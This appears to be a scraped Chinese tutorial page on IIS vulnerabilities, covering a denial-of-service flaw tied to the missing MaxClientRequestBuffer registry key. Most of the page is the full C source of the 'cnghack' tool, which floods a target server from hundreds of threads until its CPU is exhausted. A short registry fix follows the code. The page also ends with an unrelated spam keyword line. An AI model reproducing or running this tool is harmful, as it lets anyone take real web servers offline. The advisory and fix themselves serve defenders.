<form id="hz9zz"></form>
    • <form id="hz9zz"></form>
    

      

      <nobr id="hz9zz"></nobr>
      <form id="hz9zz"></form>
      3.   
          
      明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!
                   
        
                           
        
                        		  
        
                 
              
                
      ASP漏洞區分與處理方法(5)
                
                  發表時間:2024-06-16             來源:明輝站整理相關軟件相關文章人氣:          
              
      [摘要]17 IIS web server DOS 漏洞描述: 默認情況下,IIS容易被拒絕服務攻擊。如果注冊表中有一個叫 "MaxClientRequestBuffer" 的鍵未被創建,針對這種NT系 統的攻擊通常能奏效。 "MaxClientRequestBuffer&q...

                              17 IIS web server DOS 

      漏洞描述: 
      默認情況下,IIS容易被拒絕服務攻擊。如果注冊表中有一個叫 "MaxClientRequestBuffer" 的鍵未被創建,針對這種NT系 
      統的攻擊通常能奏效。 "MaxClientRequestBuffer" 這個鍵用于設置IIS允許接受的輸入量。如果 "MaxClientRequestBuffer" 
      設置為256(bytes),則攻擊者通過輸入大量的字符請求IIS將被限制在256字節以內。而系統的缺省設置對此不加限制,因此,利用 
      下面的程序。可以很容易地對IIS server實行DOS攻擊: 

      #include <stdio.h> 
      #include <windows.h> 
      #define MAX_THREAD 666 
      void cng(); 
      char *server; 
      char *buffer; 
      int port; 
      int counter = 0; 
      int current_threads = 0; 
      int main(int argc, char **argv) 
      { 
      WORD tequila; 
      WSADATA data; 
      int p; 
      DWORD tid; 
      HANDLE hThread[2000]; 
      //This code is as is and sucks as it is. Won't exit correctly and a lot 
      of other fun things. 
      //That I didn't want to take the time to do. So just ctrl+c out of the 
      code. 
      //Load up cnghack.exe 3 times for charm. 
      printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my 
      beloved.\"\n"); 
      if(argc<2){ 
      printf("Usage: %s [server] [port]\n",argv[0]); 
      exit(1); 
      } 
      buffer=malloc(17500); 
      memset( buffer, 'A', strlen(buffer)); 
      server=argv[1]; 
      port=atoi(argv[2]); 
      tequila = MAKEWORD( 1, 1 ); 
      printf("Attempting to start winsock... "); 
      if( (WSAStartup(tequila, &data)) !=0 ){ 
      printf("failed to start winsock.\n"); 
      exit(1); 
      } 
      else{ 
      printf("started winsock.\n\n"); 
      } 

      counter = 0; 
      for(p = 0 ; p < MAX_THREAD ; ++p ){ 
      hThread[counter] = CreateThread(0, 
      0, 
      (LPTHREAD_START_ROUTINE) cng, 
      ( void * )++counter, 
      0, 
      &tid); 
      } 
      Sleep(250); 
      while( current_threads ) 
      Sleep(250); 
      counter = 0; 
      printf("Terminated Threads.\n"); 
      while (counter < MAX_THREAD) 
      { 
      TerminateThread( hThread[counter], 0 ); 
      ++counter; 
      } 
      WSACleanup(); 
      return 0; 
      } 

      void cng() 
      { 
      int SockFD=0, p; 
      struct sockaddr_in DstSAin; 
      char GETKILLED[]="GET / HTTP/\r\n"; 
      int die=1; 
      printf("Entered CNG\n"); 
      ++current_threads; 
      DstSAin.sin_family = AF_INET; 
      DstSAin.sin_port = htons((u_short)port); 
      DstSAin.sin_addr.s_addr=inet_addr( server ); 
      if((SockFD = socket(AF_INET, SOCK_STREAM, 0)) < 0){ 
      printf("Failed to create socket\n"); 
      --current_threads; 
      return; 
      } 
      if(!connect(SockFD,(struct sockaddr *)&DstSAin, sizeof(DstSAin))) 
      { 
      p=send(SockFD,GETKILLED,strlen(GETKILLED),0); 
      printf("Step 1: %i\n", p); 
      for(;;){ 
      p=send(SockFD,buffer,strlen(buffer),0); 
      printf("P: %i\n", p); 
      //put in some code to check if send = -1 more then X times we drop 
      the loop and exit the thread 
      //bla bla bla i love the dirtiness of concept code. 
      } 
      } 
      --current_threads; 
      printf("Exited CNG\n"); 
      return; 
      } 

      cnghack.c works by doing the following: 
      Connects to example.com 
      Sends: GET / HTTP/[return][buffer] 

      Where: 
      [return] is just an \r\n 
      [buffer] is a never ending stream of A's 

      攻擊結果將導致NT系統的CPU占用率達到 100% 

      解決方案 
      運行Regedt32.exe 
      在:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\w3svc\parameters 
      增加一個值: 
      Value Name: MaxClientRequestBuffer 
      Data Type: REG_DWORD 
      設置為十進制 
      具體數值設置為你想設定的IIS允許接受的URL最大長度。 
      CNNS的設置為256 
      (出處:熱點網絡)


              
              
                 
              
                                            
                              		       
                          
                           		  
        
                            
      
日韩精品一区二区三区高清